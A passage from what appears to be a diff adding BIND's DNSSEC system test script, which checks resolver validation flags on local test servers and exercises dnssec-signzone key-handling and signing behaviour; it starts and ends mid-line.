+ || ret=1 +dig_with_opts r.insecure.secure.example. @10.53.0.4 soa > dig.out.ns4.test$n \ + || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check that the query for a security root is successful and has ad set + +echo_i "checking security root query ($n)" +ret=0 +dig_with_opts . @10.53.0.4 key > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check that the setting the cd bit works + +echo_i "checking cd bit on a positive answer ($n)" +ret=0 +dig_with_opts +noauth example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +dig_with_opts +noauth +cdflag example. soa @10.53.0.5 \ + > dig.out.ns5.test$n || ret=1 +digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking cd bit on a negative answer ($n)" +ret=0 +dig_with_opts q.example. soa @10.53.0.4 > dig.out.ns4.test$n || ret=1 +dig_with_opts +cdflag q.example. soa @10.53.0.5 > dig.out.ns5.test$n || ret=1 +digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking insecurity proof works using negative cache ($n)" +ret=0 +rndccmd 10.53.0.4 flush 2>&1 | sed 's/^/ns4 /' | cat_i +dig_with_opts +cd @10.53.0.4 insecure.example. ds > dig.out.ns4.test$n.1 || ret=1 +for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 +do + dig_with_opts @10.53.0.4 nonexistent.insecure.example. > dig.out.ns4.test$n.2 || ret=1 + if grep "status: NXDOMAIN" dig.out.ns4.test$n.2 >/dev/null; then + break + fi + sleep 1 +done +grep "status: NXDOMAIN" dig.out.ns4.test$n.2 >/dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation RSASHA256 NSEC ($n)" +ret=0 +dig_with_opts +noauth a.rsasha256.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.rsasha256.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation RSASHA512 NSEC ($n)" +ret=0 +dig_with_opts +noauth a.rsasha512.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.rsasha512.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation with KSK-only DNSKEY signature ($n)" +ret=0 +dig_with_opts +noauth a.kskonly.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.kskonly.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking cd bit on a query that should fail ($n)" +ret=0 +dig_with_opts a.bogus.example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +dig_with_opts +cdflag a.bogus.example. soa @10.53.0.5 \ + > dig.out.ns5.test$n || ret=1 +digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking cd bit on an insecurity proof ($n)" +ret=0 +dig_with_opts +noauth a.insecure.example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +dig_with_opts +noauth +cdflag a.insecure.example. soa @10.53.0.5 \ + > dig.out.ns5.test$n || ret=1 +digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - these are looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking cd bit on a negative insecurity proof ($n)" +ret=0 +dig_with_opts q.insecure.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +dig_with_opts +cdflag q.insecure.example. a @10.53.0.5 \ + > dig.out.ns5.test$n || ret=1 +digcomp dig.out.ns4.test$n dig.out.ns5.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - these are looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that validation of an ANY query works ($n)" +ret=0 +dig_with_opts +noauth foo.example. any @10.53.0.2 > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth foo.example. any @10.53.0.4 > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# 2 records in the zone, 1 NXT, 3 SIGs +grep "ANSWER: 6" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that validation of a query returning a CNAME works ($n)" +ret=0 +dig_with_opts +noauth cname1.example. txt @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth cname1.example. txt @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# the CNAME & its sig, the TXT and its SIG +grep "ANSWER: 4" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that validation of a query returning a DNAME works ($n)" +ret=0 +dig_with_opts +noauth foo.dname1.example. txt @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth foo.dname1.example. txt @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# The DNAME & its sig, the TXT and its SIG, and the synthesized CNAME. +# It would be nice to test that the CNAME is being synthesized by the +# recursive server and not cached, but I don't know how. +grep "ANSWER: 5" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that validation of an ANY query returning a CNAME works ($n)" +ret=0 +dig_with_opts +noauth cname2.example. any @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth cname2.example. any @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# The CNAME, NXT, and their SIGs +grep "ANSWER: 4" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that validation of an ANY query returning a DNAME works ($n)" +ret=0 +dig_with_opts +noauth foo.dname2.example. any @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth foo.dname2.example. any @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that lookups succeed after disabling an algorithm ($n)" +ret=0 +dig_with_opts +noauth example. SOA @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth example. SOA @10.53.0.6 \ + > dig.out.ns6.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns6.test$n || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns6.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking a non-cachable NODATA works ($n)" +ret=0 +dig_with_opts +noauth a.nosoa.secure.example. txt @10.53.0.7 \ + > dig.out.ns7.test$n || ret=1 +grep "AUTHORITY: 0" dig.out.ns7.test$n > /dev/null || ret=1 +dig_with_opts +noauth a.nosoa.secure.example. txt @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking a non-cachable NXDOMAIN works ($n)" +ret=0 +dig_with_opts +noauth b.nosoa.secure.example. txt @10.53.0.7 \ + > dig.out.ns7.test$n || ret=1 +grep "AUTHORITY: 0" dig.out.ns7.test$n > /dev/null || ret=1 +dig_with_opts +noauth b.nosoa.secure.example. txt @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that we can load a rfc2535 signed zone ($n)" +ret=0 +dig_with_opts rfc2535.example. SOA @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that we can transfer a rfc2535 signed zone ($n)" +ret=0 +dig_with_opts rfc2535.example. SOA @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "basic dnssec-signzone checks:" +echo_ic "two DNSKEYs ($n)" +ret=0 +( +cd signer/general || exit 1 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test1.zone > signer.out.$n +test -f signed.zone +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "one non-KSK DNSKEY ($n)" +ret=0 +( +cd signer/general || exit 0 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test2.zone > signer.out.$n +test -f signed.zone +) && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "one KSK DNSKEY ($n)" +ret=0 +( +cd signer/general || exit 0 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test3.zone > signer.out.$n +test -f signed.zone +) && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "three DNSKEY ($n)" +ret=0 +( +cd signer/general || exit 1 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test4.zone > signer.out.$n +test -f signed.zone +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "three DNSKEY, one private key missing ($n)" +ret=0 +( +cd signer/general || exit 1 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test5.zone > signer.out.$n +test -f signed.zone +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "four DNSKEY ($n)" +ret=0 +( +cd signer/general || exit 1 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test6.zone > signer.out.$n +test -f signed.zone +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "two DNSKEY, both private keys missing ($n)" +ret=0 +( +cd signer/general || exit 0 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test7.zone > signer.out.$n +test -f signed.zone +) && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "two DNSKEY, one private key missing ($n)" +ret=0 +( +cd signer/general || exit 0 +rm -f signed.zone +$SIGNER -f signed.zone -o example.com. test8.zone > signer.out.$n +test -f signed.zone +) && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "check that dnssec-signzone rejects excessive NSEC3 iterations ($n)" +ret=0 +( +cd signer/general || exit 0 +rm -f signed.zone +$SIGNER -f signed.zone -3 - -H 151 -o example.com. test9.zone > signer.out.$n +test -f signed.zone +) && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_ic "check that dnssec-signzone accepts maximum NSEC3 iterations ($n)" +ret=0 +( +cd signer/general || exit 1 +rm -f signed.zone +$SIGNER -f signed.zone -3 - -H 150 -o example.com. test9.zone > signer.out.$n +test -f signed.zone +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +get_default_algorithm_key_ids_from_sigs() { + zone=$1 + + tr -d '\r' < signer/$zone.db.signed | \ + awk -v alg=$DEFAULT_ALGORITHM_NUMBER ' + NF < 8 { next } + $(NF-5) != "RRSIG" { next } + $(NF-3) != alg { next } + $NF != "(" { next } + { + getline; + print $3; + } + ' | \ + sort -u +} + +# Test dnssec-signzone ZSK prepublish smooth rollover. +echo_i "check dnssec-signzone doesn't sign with prepublished zsk ($n)" +ret=0 +zone=prepub +# Generate keys. +ksk=$("$KEYGEN" -K signer -f KSK -q -a $DEFAULT_ALGORITHM -n zone "$zone") +zsk1=$("$KEYGEN" -K signer -q -a $DEFAULT_ALGORITHM -n zone "$zone") +zsk2=$("$KEYGEN" -K signer -q -a $DEFAULT_ALGORITHM -n zone "$zone") +zskid1=$(keyfile_to_key_id "$zsk1") +zskid2=$(keyfile_to_key_id "$zsk2") +( +cd signer || exit 1 +# Set times such that the current set of keys are introduced 60 days ago and +# start signing now. The successor key is prepublished now and will be active +# next day. +$SETTIME -P now-60d -A now $ksk > /dev/null +$SETTIME -P now-60d -A now -I now+1d -D now+60d $zsk1 > /dev/null +$SETTIME -S $zsk1 -i 1h $zsk2.key > /dev/null +$SETTIME -P now -A now+1d $zsk2.key > /dev/null +# Sign the zone with initial keys and prepublish successor. The zone signatures +# are valid for 30 days and the DNSKEY signature is valid for 60 days. +cp -f $zone.db.in $zone.db +$SIGNER -SDx -e +2592000 -X +5184000 -o $zone $zone.db > /dev/null +echo "\$INCLUDE \"$zone.db.signed\"" >> $zone.db +) +get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid1$" > /dev/null || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid2$" > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed: missing signatures from key $zskid1" +status=$((status+ret)) + +echo_i "check dnssec-signzone retains signatures of predecessor zsk ($n)" +ret=0 +zone=prepub +( +cd signer || exit 1 +# Roll the ZSK. The predecessor is inactive from now on and the successor is +# activated. The zone signatures are valid for 30 days and the DNSKEY +# signature is valid for 60 days. Because of the predecessor/successor +# relationship, the signatures of the predecessor are retained and no new +# signatures with the successor should be generated. +$SETTIME -A now-30d -I now -D now+30d $zsk1 > /dev/null +$SETTIME -A now $zsk2 > /dev/null +$SIGNER -SDx -e +2592000 -X +5184000 -o $zone $zone.db > /dev/null +) +get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid1$" > /dev/null || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid2$" > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "check dnssec-signzone swaps zone signatures after interval ($n)" +ret=0 +zone=prepub +( +cd signer || exit 1 +# After some time the signatures should be replaced. When signing, set the +# interval to 30 days plus one second, meaning all predecessor signatures +# are within the refresh interval and should be replaced with successor +# signatures. +$SETTIME -A now-50d -I now-20d -D now+10d $zsk1 > /dev/null +$SETTIME -A now-20d $zsk2 > /dev/null +$SIGNER -SDx -e +2592000 -X +5184000 -i 2592001 -o $zone $zone.db > /dev/null +) +get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid1$" > /dev/null && ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid2$" > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a key using an unsupported algorithm cannot be generated ($n)" +ret=0 +zone=example +# If dnssec-keygen fails, the test script will exit immediately. Prevent that +# from happening, and also trigger a test failure if dnssec-keygen unexpectedly +# succeeds, by using "&& ret=1". +$KEYGEN -a 255 $zone > dnssectools.out.test$n 2>&1 && ret=1 +grep -q "unsupported algorithm: 255" dnssectools.out.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a DS record cannot be generated for a key using an unsupported algorithm ($n)" +ret=0 +zone=example +# Fake an unsupported algorithm key +unsupportedkey=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +awk '$3 == "DNSKEY" { $6 = 255 } { print }' ${unsupportedkey}.key > ${unsupportedkey}.tmp +mv ${unsupportedkey}.tmp ${unsupportedkey}.key +# If dnssec-dsfromkey fails, the test script will exit immediately. Prevent +# that from happening, and also trigger a test failure if dnssec-dsfromkey +# unexpectedly succeeds, by using "&& ret=1". +$DSFROMKEY ${unsupportedkey} > dnssectools.out.test$n 2>&1 && ret=1 +grep -q "algorithm is unsupported" dnssectools.out.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a zone cannot be signed with a key using an unsupported algorithm ($n)" +ret=0 +ret=0 +cat signer/example.db.in "${unsupportedkey}.key" > signer/example.db +# If dnssec-signzone fails, the test script will exit immediately. Prevent that +# from happening, and also trigger a test failure if dnssec-signzone +# unexpectedly succeeds, by using "&& ret=1". +$SIGNER -o example signer/example.db ${unsupportedkey} > dnssectools.out.test$n 2>&1 && ret=1 +grep -q "algorithm is unsupported" dnssectools.out.test$n || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that we can sign a zone with out-of-zone records ($n)" +ret=0 +zone=example +key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone) +key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone) +( +cd signer || exit 1 +cat example.db.in "$key1.key" "$key2.key" > example.db +$SIGNER -o example -f example.db example.db > /dev/null +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that we can sign a zone (NSEC3) with out-of-zone records ($n)" +ret=0 +zone=example +key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone) +key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone) +( +cd signer || exit 1 +cat example.db.in "$key1.key" "$key2.key" > example.db +$SIGNER -3 - -H 10 -o example -f example.db example.db > /dev/null +awk '/^IQF9LQTLK/ { + printf("%s", $0); + while (!index($0, ")")) { + if (getline <= 0) + break; + printf (" %s", $0); + } + printf("\n"); + }' example.db | sed 's/[ ][ ]*/ /g' > nsec3param.out + +grep "IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG.example. 0 IN NSEC3 1 0 10 - ( IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG A NS SOA RRSIG DNSKEY NSEC3PARAM )" nsec3param.out > /dev/null +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking NSEC3 signing with empty nonterminals above a delegation ($n)" +ret=0 +zone=example +key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone) +key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone) +( +cd signer || exit 1 +cat example.db.in "$key1.key" "$key2.key" > example3.db +echo "some.empty.nonterminal.nodes.example 60 IN NS ns.example.tld" >> example3.db +$SIGNER -3 - -A -H 10 -o example -f example3.db example3.db > /dev/null +awk '/^IQF9LQTLK/ { + printf("%s", $0); + while (!index($0, ")")) { + if (getline <= 0) + break; + printf (" %s", $0); + } + printf("\n"); + }' example.db | sed 's/[ ][ ]*/ /g' > nsec3param.out + +grep "IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG.example. 0 IN NSEC3 1 0 10 - ( IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG A NS SOA RRSIG DNSKEY NSEC3PARAM )" nsec3param.out > /dev/null +) || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that dnssec-signzone updates originalttl on ttl changes ($n)" +ret=0 +zone=example +key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone) +key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone) +( +cd signer || exit 1 +cat example.db.in "$key1.key" "$key2.key" > example.db +$SIGNER -o example -f example.db.before example.db > /dev/null +sed 's/60.IN.SOA./50 IN SOA /' example.db.before > example.db.changed +$SIGNER -o example -f example.db.after example.db.changed > /dev/null +) +grep "SOA $DEFAULT_ALGORITHM_NUMBER 1 50" signer/example.db.after > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone keeps valid signatures from removed keys ($n)" +ret=0 +zone=example +key1=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone) +key2=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone) +keyid2=$(keyfile_to_key_id "$key2") +key3=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone) +keyid3=$(keyfile_to_key_id "$key3") +( +cd signer || exit 1 +cat example.db.in "$key1.key" "$key2.key" > example.db +$SIGNER -D -o example example.db > /dev/null + +# now switch out key2 for key3 and resign the zone +cat example.db.in "$key1.key" "$key3.key" > example.db +echo "\$INCLUDE \"example.db.signed\"" >> example.db +$SIGNER -D -o example example.db > /dev/null +) || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone -R purges signatures from removed keys ($n)" +ret=0 +( +cd signer || exit 1 +$SIGNER -RD -o example example.db > /dev/null +) || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null && ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone keeps valid signatures from inactive keys ($n)" +ret=0 +zone=example +( +cd signer || exit 1 +cp -f example.db.in example.db +$SIGNER -SD -o example example.db > /dev/null +echo "\$INCLUDE \"example.db.signed\"" >> example.db +# now retire key2 and resign the zone +$SETTIME -I now "$key2" > /dev/null 2>&1 +$SIGNER -SD -o example example.db > /dev/null +) || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone -Q purges signatures from inactive keys ($n)" +ret=0 +( +cd signer || exit 1 +$SIGNER -SDQ -o example example.db > /dev/null +) || ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null && ret=1 +get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone retains unexpired signatures ($n)" +ret=0 +( +cd signer || exit 1 +$SIGNER -Sxt -o example example.db > signer.out.1 +$SIGNER -Sxt -o example -f example.db.signed example.db.signed > signer.out.2 +) || ret=1 +gen1=$(awk '/generated/ {print $3}' signer/signer.out.1) +retain1=$(awk '/retained/ {print $3}' signer/signer.out.1) +gen2=$(awk '/generated/ {print $3}' signer/signer.out.2) +retain2=$(awk '/retained/ {print $3}' signer/signer.out.2) +drop2=$(awk '/dropped/ {print $3}' signer/signer.out.2) +[ "$retain2" -eq $((gen1+retain1)) ] || ret=1 +[ "$gen2" -eq 0 ] || ret=1 +[ "$drop2" -eq 0 ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone purges RRSIGs from formerly-owned glue (nsec) ($n)" +ret=0 +( +cd signer || exit 1 +# remove NSEC-only keys +rm -f Kexample.+005* +cp -f example.db.in example2.db +cat << EOF >> example2.db +sub1.example. IN A 10.53.0.1 +ns.sub2.example. IN A 10.53.0.2 +EOF +echo "\$INCLUDE \"example2.db.signed\"" >> example2.db +touch example2.db.signed +$SIGNER -DS -O full -f example2.db.signed -o example example2.db > /dev/null +) || ret=1 +grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1 +grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1 +( +cd signer || exit 1 +cp -f example.db.in example2.db +cat << EOF >> example2.db +sub1.example. IN NS sub1.example. +sub1.example. IN A 10.53.0.1 +sub2.example. IN NS ns.sub2.example. +ns.sub2.example. IN A 10.53.0.2 +EOF +echo "\$INCLUDE \"example2.db.signed\"" >> example2.db +$SIGNER -DS -O full -f example2.db.signed -o example example2.db > /dev/null +) || ret=1 +grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1 +grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone purges RRSIGs from formerly-owned glue (nsec3) ($n)" +ret=0 +( +cd signer || exit 1 +rm -f example2.db.signed +cp -f example.db.in example2.db +cat << EOF >> example2.db +sub1.example. IN A 10.53.0.1 +ns.sub2.example. IN A 10.53.0.2 +EOF +echo "\$INCLUDE \"example2.db.signed\"" >> example2.db +touch example2.db.signed +$SIGNER -DS -3 feedabee -O full -f example2.db.signed -o example example2.db > /dev/null +) || ret=1 +grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1 +grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1 +( +cd signer || exit 1 +cp -f example.db.in example2.db +cat << EOF >> example2.db +sub1.example. IN NS sub1.example. +sub1.example. IN A 10.53.0.1 +sub2.example. IN NS ns.sub2.example. +ns.sub2.example. IN A 10.53.0.2 +EOF +echo "\$INCLUDE \"example2.db.signed\"" >> example2.db +$SIGNER -DS -3 feedabee -O full -f example2.db.signed -o example example2.db > /dev/null +) || ret=1 +grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1 +grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone output format ($n)" +ret=0 +( +cd signer || exit 1 +$SIGNER -O full -f - -Sxt -o example example.db > signer.out.3 2> /dev/null +$SIGNER -O text -f - -Sxt -o example example.db > signer.out.4 2> 